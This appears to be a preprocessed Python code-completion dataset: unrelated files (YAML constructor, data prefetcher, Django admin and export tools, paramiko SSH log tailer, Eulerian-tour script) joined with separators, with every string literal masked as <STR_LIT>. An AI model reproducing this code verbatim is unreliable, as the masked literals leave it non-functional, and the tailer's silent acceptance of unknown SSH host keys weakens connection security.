and isinstance ( d1 [ k ] , dict ) and isinstance ( d2 [ k ] , dict ) : <EOL> mergedefaults ( d1 [ k ] , d2 [ k ] ) <EOL> else : <EOL> d1 . setdefault ( k , d2 [ k ] ) <EOL> def _setmerged ( d1 , d2 ) : <EOL> if hasattr ( d1 , '<STR_LIT>' ) : <EOL> d1 . setmerged ( d2 ) <EOL> def mergedicts_copy ( d1 , d2 ) : <EOL> '''<STR_LIT>''' <EOL> ret = d1 . copy ( ) <EOL> _setmerged ( ret , d2 ) <EOL> for k in d2 : <EOL> if k in d1 and isinstance ( d1 [ k ] , dict ) and isinstance ( d2 [ k ] , dict ) : <EOL> ret [ k ] = mergedicts_copy ( d1 [ k ] , d2 [ k ] ) <EOL> else : <EOL> ret [ k ] = d2 [ k ] <EOL> return ret <EOL> def updated ( d , * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> d = d . copy ( ) <EOL> d . 
update ( * args , ** kwargs ) <EOL> return d </s>
<s> from __future__ import ( unicode_literals , division , absolute_import , print_function ) <EOL> import collections <EOL> import types <EOL> from functools import wraps <EOL> from powerline . lint . markedjson . error import MarkedError <EOL> from powerline . lint . markedjson import nodes <EOL> from powerline . lint . markedjson . markedvalue import gen_marked_value <EOL> from powerline . lib . unicode import unicode <EOL> def marked ( func ) : <EOL> @ wraps ( func ) <EOL> def f ( self , node , * args , ** kwargs ) : <EOL> return gen_marked_value ( func ( self , node , * args , ** kwargs ) , node . start_mark ) <EOL> return f <EOL> class ConstructorError ( MarkedError ) : <EOL> pass <EOL> class BaseConstructor : <EOL> yaml_constructors = { } <EOL> def __init__ ( self ) : <EOL> self . constructed_objects = { } <EOL> self . state_generators = [ ] <EOL> self . deep_construct = False <EOL> def check_data ( self ) : <EOL> return self . check_node ( ) <EOL> def get_data ( self ) : <EOL> if self . check_node ( ) : <EOL> return self . construct_document ( self . get_node ( ) ) <EOL> def get_single_data ( self ) : <EOL> node = self . get_single_node ( ) <EOL> if node is not None : <EOL> return self . construct_document ( node ) <EOL> return None <EOL> def construct_document ( self , node ) : <EOL> data = self . construct_object ( node ) <EOL> while self . state_generators : <EOL> state_generators = self . state_generators <EOL> self . state_generators = [ ] <EOL> for generator in state_generators : <EOL> for dummy in generator : <EOL> pass <EOL> self . constructed_objects = { } <EOL> self . deep_construct = False <EOL> return data <EOL> def construct_object ( self , node , deep = False ) : <EOL> if node in self . constructed_objects : <EOL> return self . constructed_objects [ node ] <EOL> if deep : <EOL> old_deep = self . deep_construct <EOL> self . deep_construct = True <EOL> constructor = None <EOL> tag_suffix = None <EOL> if node . tag in self . 
yaml_constructors : <EOL> constructor = self . yaml_constructors [ node . tag ] <EOL> else : <EOL> raise ConstructorError ( None , None , '<STR_LIT>' % node . tag ) <EOL> if tag_suffix is None : <EOL> data = constructor ( self , node ) <EOL> else : <EOL> data = constructor ( self , tag_suffix , node ) <EOL> if isinstance ( data , types . GeneratorType ) : <EOL> generator = data <EOL> data = next ( generator ) <EOL> if self . deep_construct : <EOL> for dummy in generator : <EOL> pass <EOL> else : <EOL> self . state_generators . append ( generator ) <EOL> self . constructed_objects [ node ] = data <EOL> if deep : <EOL> self . deep_construct = old_deep <EOL> return data <EOL> @ marked <EOL> def construct_scalar ( self , node ) : <EOL> if not isinstance ( node , nodes . ScalarNode ) : <EOL> raise ConstructorError ( <EOL> None , None , <EOL> '<STR_LIT>' % node . id , <EOL> node . start_mark <EOL> ) <EOL> return node . value <EOL> def construct_sequence ( self , node , deep = False ) : <EOL> if not isinstance ( node , nodes . SequenceNode ) : <EOL> raise ConstructorError ( <EOL> None , None , <EOL> '<STR_LIT>' % node . id , <EOL> node . start_mark <EOL> ) <EOL> return [ <EOL> self . construct_object ( child , deep = deep ) <EOL> for child in node . value <EOL> ] <EOL> @ marked <EOL> def construct_mapping ( self , node , deep = False ) : <EOL> if not isinstance ( node , nodes . MappingNode ) : <EOL> raise ConstructorError ( <EOL> None , None , <EOL> '<STR_LIT>' % node . id , <EOL> node . start_mark <EOL> ) <EOL> mapping = { } <EOL> for key_node , value_node in node . value : <EOL> key = self . construct_object ( key_node , deep = deep ) <EOL> if not isinstance ( key , collections . Hashable ) : <EOL> self . echoerr ( <EOL> '<STR_LIT>' , node . start_mark , <EOL> '<STR_LIT>' , key_node . start_mark <EOL> ) <EOL> continue <EOL> elif type ( key . value ) != unicode : <EOL> self . echoerr ( <EOL> '<STR_LIT>' , node . start_mark , <EOL> '<STR_LIT>' , key_node . 
start_mark <EOL> ) <EOL> continue <EOL> elif key in mapping : <EOL> self . echoerr ( <EOL> '<STR_LIT>' , node . start_mark , <EOL> '<STR_LIT>' , key_node . start_mark <EOL> ) <EOL> continue <EOL> value = self . construct_object ( value_node , deep = deep ) <EOL> mapping [ key ] = value <EOL> return mapping <EOL> @ classmethod <EOL> def add_constructor ( cls , tag , constructor ) : <EOL> if '<STR_LIT>' not in cls . __dict__ : <EOL> cls . yaml_constructors = cls . yaml_constructors . copy ( ) <EOL> cls . yaml_constructors [ tag ] = constructor <EOL> class Constructor ( BaseConstructor ) : <EOL> def construct_scalar ( self , node ) : <EOL> if isinstance ( node , nodes . MappingNode ) : <EOL> for key_node , value_node in node . value : <EOL> if key_node . tag == '<STR_LIT>' : <EOL> return self . construct_scalar ( value_node ) <EOL> return BaseConstructor . construct_scalar ( self , node ) <EOL> def flatten_mapping ( self , node ) : <EOL> merge = [ ] <EOL> index = <NUM_LIT:0> <EOL> while index < len ( node . value ) : <EOL> key_node , value_node = node . value [ index ] <EOL> if key_node . tag == '<STR_LIT>' : <EOL> del node . value [ index ] <EOL> if isinstance ( value_node , nodes . MappingNode ) : <EOL> self . flatten_mapping ( value_node ) <EOL> merge . extend ( value_node . value ) <EOL> elif isinstance ( value_node , nodes . SequenceNode ) : <EOL> submerge = [ ] <EOL> for subnode in value_node . value : <EOL> if not isinstance ( subnode , nodes . MappingNode ) : <EOL> raise ConstructorError ( <EOL> '<STR_LIT>' , <EOL> node . start_mark , <EOL> '<STR_LIT>' % subnode . id , <EOL> subnode . start_mark <EOL> ) <EOL> self . flatten_mapping ( subnode ) <EOL> submerge . append ( subnode . value ) <EOL> submerge . reverse ( ) <EOL> for value in submerge : <EOL> merge . extend ( value ) <EOL> else : <EOL> raise ConstructorError ( <EOL> '<STR_LIT>' , <EOL> node . start_mark , <EOL> ( '<STR_LIT>' % value_node . id ) , <EOL> value_node . 
start_mark <EOL> ) <EOL> elif key_node . tag == '<STR_LIT>' : <EOL> key_node . tag = '<STR_LIT>' <EOL> index += <NUM_LIT:1> <EOL> else : <EOL> index += <NUM_LIT:1> <EOL> if merge : <EOL> node . value = merge + node . value <EOL> def construct_mapping ( self , node , deep = False ) : <EOL> if isinstance ( node , nodes . MappingNode ) : <EOL> self . flatten_mapping ( node ) <EOL> return BaseConstructor . construct_mapping ( self , node , deep = deep ) <EOL> @ marked <EOL> def construct_yaml_null ( self , node ) : <EOL> self . construct_scalar ( node ) <EOL> return None <EOL> @ marked <EOL> def construct_yaml_bool ( self , node ) : <EOL> value = self . construct_scalar ( node ) . value <EOL> return bool ( value ) <EOL> @ marked <EOL> def construct_yaml_int ( self , node ) : <EOL> value = self . construct_scalar ( node ) . value <EOL> sign = + <NUM_LIT:1> <EOL> if value [ <NUM_LIT:0> ] == '<STR_LIT:->' : <EOL> sign = - <NUM_LIT:1> <EOL> if value [ <NUM_LIT:0> ] in '<STR_LIT>' : <EOL> value = value [ <NUM_LIT:1> : ] <EOL> if value == '<STR_LIT:0>' : <EOL> return <NUM_LIT:0> <EOL> else : <EOL> return sign * int ( value ) <EOL> @ marked <EOL> def construct_yaml_float ( self , node ) : <EOL> value = self . construct_scalar ( node ) . value <EOL> sign = + <NUM_LIT:1> <EOL> if value [ <NUM_LIT:0> ] == '<STR_LIT:->' : <EOL> sign = - <NUM_LIT:1> <EOL> if value [ <NUM_LIT:0> ] in '<STR_LIT>' : <EOL> value = value [ <NUM_LIT:1> : ] <EOL> else : <EOL> return sign * float ( value ) <EOL> def construct_yaml_str ( self , node ) : <EOL> return self . construct_scalar ( node ) <EOL> def construct_yaml_seq ( self , node ) : <EOL> data = gen_marked_value ( [ ] , node . start_mark ) <EOL> yield data <EOL> data . extend ( self . construct_sequence ( node ) ) <EOL> def construct_yaml_map ( self , node ) : <EOL> data = gen_marked_value ( { } , node . start_mark ) <EOL> yield data <EOL> value = self . construct_mapping ( node ) <EOL> data . 
update ( value ) <EOL> def construct_undefined ( self , node ) : <EOL> raise ConstructorError ( <EOL> None , None , <EOL> '<STR_LIT>' % node . tag , <EOL> node . start_mark <EOL> ) <EOL> Constructor . add_constructor ( <EOL> '<STR_LIT>' , Constructor . construct_yaml_null ) <EOL> Constructor . add_constructor ( <EOL> '<STR_LIT>' , Constructor . construct_yaml_bool ) <EOL> Constructor . add_constructor ( <EOL> '<STR_LIT>' , Constructor . construct_yaml_int ) <EOL> Constructor . add_constructor ( <EOL> '<STR_LIT>' , Constructor . construct_yaml_float ) <EOL> Constructor . add_constructor ( <EOL> '<STR_LIT>' , Constructor . construct_yaml_str ) <EOL> Constructor . add_constructor ( <EOL> '<STR_LIT>' , Constructor . construct_yaml_seq ) <EOL> Constructor . add_constructor ( <EOL> '<STR_LIT>' , Constructor . construct_yaml_map ) <EOL> Constructor . add_constructor ( <EOL> None , Constructor . construct_undefined ) </s>
<s> from __future__ import ( unicode_literals , division , absolute_import , print_function ) <EOL> try : <EOL> import vim <EOL> except ImportError : <EOL> vim = object ( ) <EOL> from powerline . bindings . vim import bufvar_exists <EOL> from powerline . segments . vim import window_cached <EOL> @ window_cached <EOL> def nerdtree ( pl ) : <EOL> '''<STR_LIT>''' <EOL> if not bufvar_exists ( None , '<STR_LIT>' ) : <EOL> return None <EOL> path_str = vim . eval ( '<STR_LIT>' ) <EOL> return [ { <EOL> '<STR_LIT>' : path_str , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> } ] </s>
<s> from pkgutil import walk_packages <EOL> import os <EOL> def _global_import ( name ) : <EOL> p = __import__ ( name , globals ( ) , locals ( ) , level = <NUM_LIT:1> ) <EOL> lst = p . __all__ if '<STR_LIT>' in dir ( p ) else dir ( p ) <EOL> del globals ( ) [ name ] <EOL> for k in lst : <EOL> globals ( ) [ k ] = p . __dict__ [ k ] <EOL> for _ , module_name , _ in walk_packages ( <EOL> [ os . path . dirname ( __file__ ) ] ) : <EOL> if not module_name . startswith ( '<STR_LIT:_>' ) : <EOL> _global_import ( module_name ) </s>
<s> import multiprocessing <EOL> from six . moves import range <EOL> from . base import ProxyDataFlow <EOL> from . . utils . concurrency import ensure_proc_terminate <EOL> from . . utils import logger <EOL> __all__ = [ '<STR_LIT>' ] <EOL> class PrefetchProcess ( multiprocessing . Process ) : <EOL> def __init__ ( self , ds , queue ) : <EOL> """<STR_LIT>""" <EOL> super ( PrefetchProcess , self ) . __init__ ( ) <EOL> self . ds = ds <EOL> self . queue = queue <EOL> def run ( self ) : <EOL> self . ds . reset_state ( ) <EOL> while True : <EOL> for dp in self . ds . get_data ( ) : <EOL> self . queue . put ( dp ) <EOL> class PrefetchData ( ProxyDataFlow ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ds , nr_prefetch , nr_proc = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> super ( PrefetchData , self ) . __init__ ( ds ) <EOL> self . _size = self . size ( ) <EOL> self . nr_proc = nr_proc <EOL> self . nr_prefetch = nr_prefetch <EOL> self . queue = multiprocessing . Queue ( self . nr_prefetch ) <EOL> self . procs = [ PrefetchProcess ( self . ds , self . queue ) <EOL> for _ in range ( self . nr_proc ) ] <EOL> ensure_proc_terminate ( self . procs ) <EOL> for x in self . procs : <EOL> x . start ( ) <EOL> def get_data ( self ) : <EOL> for _ in range ( self . _size ) : <EOL> dp = self . queue . get ( ) <EOL> yield dp <EOL> def __del__ ( self ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> self . queue . close ( ) <EOL> for x in self . procs : <EOL> x . terminate ( ) <EOL> logger . info ( "<STR_LIT>" ) </s>
<s> from collections import namedtuple , defaultdict <EOL> from abc import abstractmethod <EOL> import numpy as np <EOL> import copy <EOL> import os <EOL> from six . moves import zip <EOL> from . utils import change_env <EOL> from . import logger <EOL> def get_processor ( ) : <EOL> ret = { } <EOL> def process_conv ( layer_name , param , input_data_shape ) : <EOL> assert len ( param ) == <NUM_LIT:2> <EOL> return { layer_name + '<STR_LIT>' : param [ <NUM_LIT:0> ] . data . transpose ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:0> ) , <EOL> layer_name + '<STR_LIT>' : param [ <NUM_LIT:1> ] . data } <EOL> ret [ '<STR_LIT>' ] = process_conv <EOL> def process_fc ( layer_name , param , input_data_shape ) : <EOL> assert len ( param ) == <NUM_LIT:2> <EOL> if len ( input_data_shape ) == <NUM_LIT:3> : <EOL> logger . info ( "<STR_LIT>" . format ( layer_name ) ) <EOL> W = param [ <NUM_LIT:0> ] . data <EOL> W = W . reshape ( ( - <NUM_LIT:1> , ) + input_data_shape ) . transpose ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> else : <EOL> W = param [ <NUM_LIT:0> ] . data . transpose ( ) <EOL> return { layer_name + '<STR_LIT>' : W , <EOL> layer_name + '<STR_LIT>' : param [ <NUM_LIT:1> ] . data } <EOL> ret [ '<STR_LIT>' ] = process_fc <EOL> return ret <EOL> def load_caffe ( model_desc , model_file ) : <EOL> """<STR_LIT>""" <EOL> param_dict = { } <EOL> param_processors = get_processor ( ) <EOL> with change_env ( '<STR_LIT>' , '<STR_LIT:2>' ) : <EOL> import caffe <EOL> caffe . set_mode_cpu ( ) <EOL> net = caffe . Net ( model_desc , model_file , caffe . TEST ) <EOL> layer_names = net . _layer_names <EOL> blob_names = net . blobs . keys ( ) <EOL> for layername , layer in zip ( layer_names , net . layers ) : <EOL> try : <EOL> prev_blob_name = blob_names [ blob_names . index ( layername ) - <NUM_LIT:1> ] <EOL> prev_data_shape = net . blobs [ prev_blob_name ] . data . shape [ <NUM_LIT:1> : ] <EOL> except ValueError : <EOL> prev_data_shape = None <EOL> if layer . 
type in param_processors : <EOL> param_dict . update ( param_processors [ layer . type ] ( <EOL> layername , layer . blobs , prev_data_shape ) ) <EOL> else : <EOL> assert len ( layer . blobs ) == <NUM_LIT:0> , len ( layer . blobs ) <EOL> logger . info ( "<STR_LIT>" + "<STR_LIT:U+0020>" . join ( sorted ( param_dict . keys ( ) ) ) ) <EOL> return param_dict <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import argparse <EOL> parser = argparse . ArgumentParser ( ) <EOL> parser . add_argument ( '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' ) <EOL> args = parser . parse_args ( ) <EOL> ret = load_caffe ( args . model , args . weights ) <EOL> import numpy as np <EOL> np . save ( args . output , ret ) </s>
<s> import mimetypes <EOL> from django import template <EOL> from django . conf import settings <EOL> from django . contrib import messages <EOL> from django . contrib . admin import helpers <EOL> from django . http import HttpResponse <EOL> from django . shortcuts import render_to_response <EOL> from django . utils . translation import ugettext as _ <EOL> import object_tools <EOL> from export import forms , tasks , utils <EOL> class Export ( object_tools . ObjectTool ) : <EOL> name = '<STR_LIT>' <EOL> label = '<STR_LIT>' <EOL> help_text = '<STR_LIT>' <EOL> form_class = forms . Export <EOL> def serialize ( self , format , queryset , fields = [ ] ) : <EOL> return utils . serialize ( format , queryset , fields ) <EOL> def gen_filename ( self , format ) : <EOL> app_label = self . model . _meta . app_label <EOL> object_name = self . model . _meta . object_name . lower ( ) <EOL> if format == '<STR_LIT>' : <EOL> format = '<STR_LIT>' <EOL> return '<STR_LIT>' % ( self . name , app_label , object_name , format ) <EOL> def order ( self , queryset , by , direction ) : <EOL> return utils . order_queryset ( queryset , by , direction ) <EOL> def has_celery ( self ) : <EOL> return '<STR_LIT>' in getattr ( settings , '<STR_LIT>' , [ ] ) <EOL> def get_queryset ( self , form ) : <EOL> return utils . get_queryset ( form , self . model ) <EOL> def get_data ( self , form ) : <EOL> queryset = self . get_queryset ( form ) <EOL> format = form . cleaned_data [ '<STR_LIT>' ] <EOL> fields = form . cleaned_data [ '<STR_LIT>' ] <EOL> data = self . serialize ( format , queryset , fields ) <EOL> return format , data <EOL> def export_response ( self , form ) : <EOL> format , data = self . get_data ( form ) <EOL> filename = self . gen_filename ( format ) <EOL> response = HttpResponse ( <EOL> data , content_type = mimetypes . 
guess_type ( filename ) [ <NUM_LIT:0> ] <EOL> ) <EOL> response [ '<STR_LIT>' ] = '<STR_LIT>' % filename <EOL> return response <EOL> def mail_response ( self , request , extra_context = None ) : <EOL> form = extra_context [ '<STR_LIT>' ] <EOL> format = form . cleaned_data [ '<STR_LIT>' ] <EOL> filename = self . gen_filename ( format ) <EOL> serializer_kwargs = { <EOL> '<STR_LIT>' : form . cleaned_data [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : format <EOL> } <EOL> query_kwargs = { <EOL> '<STR_LIT>' : form , <EOL> '<STR_LIT>' : self . model <EOL> } <EOL> if self . has_celery ( ) : <EOL> return tasks . mail_export . delay ( <EOL> request . user . email , filename , serializer_kwargs , query_kwargs <EOL> ) <EOL> return utils . mail_export ( <EOL> request . user . email , filename , serializer_kwargs , query_kwargs <EOL> ) <EOL> def view ( self , request , extra_context = None , process_form = True ) : <EOL> form = extra_context [ '<STR_LIT>' ] <EOL> if form . is_valid ( ) and process_form : <EOL> if '<STR_LIT>' in request . POST : <EOL> message = _ ( '<STR_LIT>' % ( request . user . email ) ) <EOL> messages . add_message ( request , messages . SUCCESS , message ) <EOL> self . mail_response ( request , extra_context ) <EOL> else : <EOL> return self . export_response ( form ) <EOL> adminform = helpers . AdminForm ( form , form . fieldsets , { } ) <EOL> context = { '<STR_LIT>' : adminform } <EOL> context . update ( extra_context or { } ) <EOL> context_instance = template . RequestContext ( request ) <EOL> return render_to_response ( <EOL> '<STR_LIT>' , <EOL> context , <EOL> context_instance = context_instance <EOL> ) <EOL> object_tools . tools . register ( Export ) </s>
<s> """<STR_LIT>""" <EOL> from django . contrib import admin <EOL> from django . contrib . contenttypes import generic <EOL> from models import * <EOL> class GalleryAdmin ( admin . ModelAdmin ) : <EOL> list_display = ( '<STR_LIT:title>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> list_filter = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> date_hierarchy = '<STR_LIT>' <EOL> prepopulated_fields = { '<STR_LIT>' : ( '<STR_LIT:title>' , ) } <EOL> filter_horizontal = ( '<STR_LIT>' , ) <EOL> class PhotoAdmin ( admin . ModelAdmin ) : <EOL> list_display = ( '<STR_LIT:title>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> list_filter = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> search_fields = [ '<STR_LIT:title>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> list_per_page = <NUM_LIT:10> <EOL> prepopulated_fields = { '<STR_LIT>' : ( '<STR_LIT:title>' , ) } <EOL> class PhotoEffectAdmin ( admin . ModelAdmin ) : <EOL> list_display = ( '<STR_LIT:name>' , '<STR_LIT:description>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> fieldsets = ( <EOL> ( None , { <EOL> '<STR_LIT>' : ( '<STR_LIT:name>' , '<STR_LIT:description>' ) <EOL> } ) , <EOL> ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> } ) , <EOL> ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , ) <EOL> } ) , <EOL> ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> } ) , <EOL> ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , ) <EOL> } ) , <EOL> ) <EOL> class PhotoSizeAdmin ( admin . 
ModelAdmin ) : <EOL> list_display = ( '<STR_LIT:name>' , '<STR_LIT:width>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> fieldsets = ( <EOL> ( None , { <EOL> '<STR_LIT>' : ( '<STR_LIT:name>' , '<STR_LIT:width>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> } ) , <EOL> ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> } ) , <EOL> ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' , ) <EOL> } ) , <EOL> ) <EOL> class WatermarkAdmin ( admin . ModelAdmin ) : <EOL> list_display = ( '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class GalleryUploadAdmin ( admin . ModelAdmin ) : <EOL> def has_change_permission ( self , request , obj = None ) : <EOL> return False <EOL> class ImageOverrideInline ( generic . GenericTabularInline ) : <EOL> model = ImageOverride <EOL> admin . site . register ( Gallery , GalleryAdmin ) <EOL> admin . site . register ( GalleryUpload , GalleryUploadAdmin ) <EOL> admin . site . register ( Photo , PhotoAdmin ) <EOL> admin . site . register ( PhotoEffect , PhotoEffectAdmin ) <EOL> admin . site . register ( PhotoSize , PhotoSizeAdmin ) <EOL> admin . site . register ( Watermark , WatermarkAdmin ) </s>
<s> import os <EOL> import time <EOL> import paramiko <EOL> class SSHTailer ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , host , remote_filename , private_key = None , verbose = False ) : <EOL> if '<STR_LIT:@>' in host : <EOL> self . username , self . host = tuple ( host . split ( '<STR_LIT:@>' ) ) <EOL> else : <EOL> self . username , self . host = None , host <EOL> self . remote_filename = remote_filename <EOL> self . private_key = private_key <EOL> self . client = None <EOL> self . sftp_client = None <EOL> self . remote_file_size = None <EOL> self . line_terminators = [ '<STR_LIT:\r>' , '<STR_LIT:\n>' , '<STR_LIT:\r\n>' ] <EOL> self . line_terminators_joined = '<STR_LIT:\r\n>' <EOL> self . verbose = verbose <EOL> def connect ( self ) : <EOL> if self . verbose : <EOL> print "<STR_LIT>" % self . host <EOL> self . client = paramiko . SSHClient ( ) <EOL> self . client . load_system_host_keys ( ) <EOL> self . client . set_missing_host_key_policy ( paramiko . AutoAddPolicy ( ) ) <EOL> if self . private_key : <EOL> self . client . connect ( self . host , username = self . username , pkey = self . private_key ) <EOL> else : <EOL> self . client . connect ( self . host , username = self . username ) <EOL> if self . verbose : <EOL> print "<STR_LIT>" % self . remote_filename <EOL> self . sftp_client = self . client . open_sftp ( ) <EOL> def tail ( self ) : <EOL> if not self . sftp_client : <EOL> self . connect ( ) <EOL> fstat = self . sftp_client . stat ( self . remote_filename ) <EOL> if self . remote_file_size is not None : <EOL> if self . remote_file_size < fstat . st_size : <EOL> for line in self . get_new_lines ( ) : <EOL> yield line <EOL> self . remote_file_size = fstat . st_size <EOL> def get_new_lines ( self ) : <EOL> """<STR_LIT>""" <EOL> remote_file = self . sftp_client . open ( self . remote_filename , '<STR_LIT:r>' ) <EOL> remote_file . seek ( self . remote_file_size , <NUM_LIT:0> ) <EOL> line = remote_file . 
readline ( ) <EOL> while line : <EOL> yield line . strip ( self . line_terminators_joined ) <EOL> line = remote_file . readline ( ) <EOL> remote_file . close ( ) <EOL> def disconnect ( self ) : <EOL> if self . sftp_client : <EOL> if self . verbose : <EOL> print "<STR_LIT>" <EOL> self . sftp_client . close ( ) <EOL> self . sftp_client = None <EOL> if self . client : <EOL> if self . verbose : <EOL> print "<STR_LIT>" <EOL> self . client . close ( ) <EOL> self . client = None <EOL> class SSHMultiTailer ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , host_files , poll_interval = <NUM_LIT> , private_key = None , verbose = False ) : <EOL> """<STR_LIT>""" <EOL> self . host_files = host_files <EOL> self . poll_interval = poll_interval <EOL> self . private_key = private_key <EOL> self . tailers = { } <EOL> self . verbose = verbose <EOL> def connect ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . verbose : <EOL> print "<STR_LIT>" <EOL> for host , files in self . host_files . iteritems ( ) : <EOL> self . tailers [ host ] = { } <EOL> for f in files : <EOL> self . tailers [ host ] [ f ] = SSHTailer ( host , f , private_key = self . private_key , verbose = self . verbose ) <EOL> def tail ( self , report_sleep = False ) : <EOL> """<STR_LIT>""" <EOL> if not self . tailers : <EOL> self . connect ( ) <EOL> try : <EOL> while <NUM_LIT:1> : <EOL> lines_read = <NUM_LIT:0> <EOL> for host , tailers in self . tailers . iteritems ( ) : <EOL> for filename , tailer in tailers . iteritems ( ) : <EOL> for line in tailer . tail ( ) : <EOL> yield host , filename , line <EOL> lines_read += <NUM_LIT:1> <EOL> if not lines_read : <EOL> if report_sleep : <EOL> yield None , None , None <EOL> self . sleep ( ) <EOL> finally : <EOL> self . disconnect ( ) <EOL> def sleep ( self ) : <EOL> time . sleep ( self . poll_interval ) <EOL> def disconnect ( self ) : <EOL> """<STR_LIT>""" <EOL> for host , tailers in self . tailers . iteritems ( ) : <EOL> for filename , tailer in tailers . 
iteritems ( ) : <EOL> tailer . disconnect ( ) <EOL> self . tailers = { } <EOL> if self . verbose : <EOL> print "<STR_LIT>" </s>
<s> def get_a_tour ( ) : <EOL> '''<STR_LIT>''' <EOL> global graph <EOL> nodes_degree = { } <EOL> for edge in graph : <EOL> a , b = edge [ <NUM_LIT:0> ] , edge [ <NUM_LIT:1> ] <EOL> nodes_degree [ a ] = nodes_degree . get ( a , <NUM_LIT:0> ) + <NUM_LIT:1> <EOL> nodes_degree [ b ] = nodes_degree . get ( b , <NUM_LIT:0> ) + <NUM_LIT:1> <EOL> tour = [ ] <EOL> loop = enumerate ( nodes_degree ) <EOL> while True : <EOL> try : <EOL> l = loop . __next__ ( ) <EOL> index = l [ <NUM_LIT:0> ] <EOL> node = l [ <NUM_LIT:1> ] <EOL> degree = nodes_degree [ node ] <EOL> try : <EOL> if ( tour [ - <NUM_LIT:1> ] , node ) in graph or ( node , tour [ - <NUM_LIT:1> ] ) in graph : <EOL> tour . append ( node ) <EOL> try : <EOL> graph . remove ( ( tour [ - <NUM_LIT:2> ] , tour [ - <NUM_LIT:1> ] ) ) <EOL> nodes_degree [ tour [ - <NUM_LIT:1> ] ] -= <NUM_LIT:1> <EOL> nodes_degree [ tour [ - <NUM_LIT:2> ] ] -= <NUM_LIT:1> <EOL> except ValueError : <EOL> graph . remove ( ( tour [ - <NUM_LIT:1> ] , tour [ - <NUM_LIT:2> ] ) ) <EOL> nodes_degree [ tour [ - <NUM_LIT:1> ] ] -= <NUM_LIT:1> <EOL> nodes_degree [ tour [ - <NUM_LIT:2> ] ] -= <NUM_LIT:1> <EOL> except IndexError : <EOL> tour . append ( node ) <EOL> except StopIteration : <EOL> loop = enumerate ( nodes_degree ) <EOL> if len ( tour ) > <NUM_LIT:2> : <EOL> if tour [ <NUM_LIT:0> ] == tour [ - <NUM_LIT:1> ] : <EOL> return tour <EOL> def get_eulerian_tour ( ) : <EOL> '''<STR_LIT>''' <EOL> global graph <EOL> tour = get_a_tour ( ) <EOL> if graph : <EOL> loop = enumerate ( tour [ : - <NUM_LIT:1> ] ) <EOL> l = loop . __next__ ( ) <EOL> i = l [ <NUM_LIT:0> ] <EOL> node = l [ <NUM_LIT:1> ] <EOL> try : <EOL> while True : <EOL> if node in list ( zip ( * graph ) ) [ <NUM_LIT:0> ] or node in list ( zip ( * graph ) ) [ <NUM_LIT:1> ] : <EOL> t = get_a_tour ( ) <EOL> j = t . 
index ( node ) <EOL> tour = tour [ : i ] + t [ j : - <NUM_LIT:1> ] + t [ : j + <NUM_LIT:1> ] + tour [ i + <NUM_LIT:1> : ] <EOL> if not graph : <EOL> return tour <EOL> loop = enumerate ( tour [ : - <NUM_LIT:1> ] ) <EOL> l = loop . __next__ ( ) <EOL> i = l [ <NUM_LIT:0> ] <EOL> node = l [ <NUM_LIT:1> ] <EOL> except StopIteration : <EOL> print ( "<STR_LIT>" ) <EOL> exit ( ) <EOL> else : <EOL> return tour <EOL> nodes_degree = { } <EOL> for edge in graph : <EOL> a , b = edge [ <NUM_LIT:0> ] , edge [ <NUM_LIT:1> ] <EOL> nodes_degree [ a ] = nodes_degree . get ( a , <NUM_LIT:0> ) + <NUM_LIT:1> <EOL> nodes_degree [ b ] = nodes_degree . get ( b , <NUM_LIT:0> ) + <NUM_LIT:1> <EOL> degrees = nodes_degree . values ( ) <EOL> for degree in degrees : <EOL> if degree % <NUM_LIT:2> : <EOL> print ( "<STR_LIT>" ) <EOL> exit ( ) <EOL> tour = get_eulerian_tour ( ) <EOL> print ( tour ) </s>
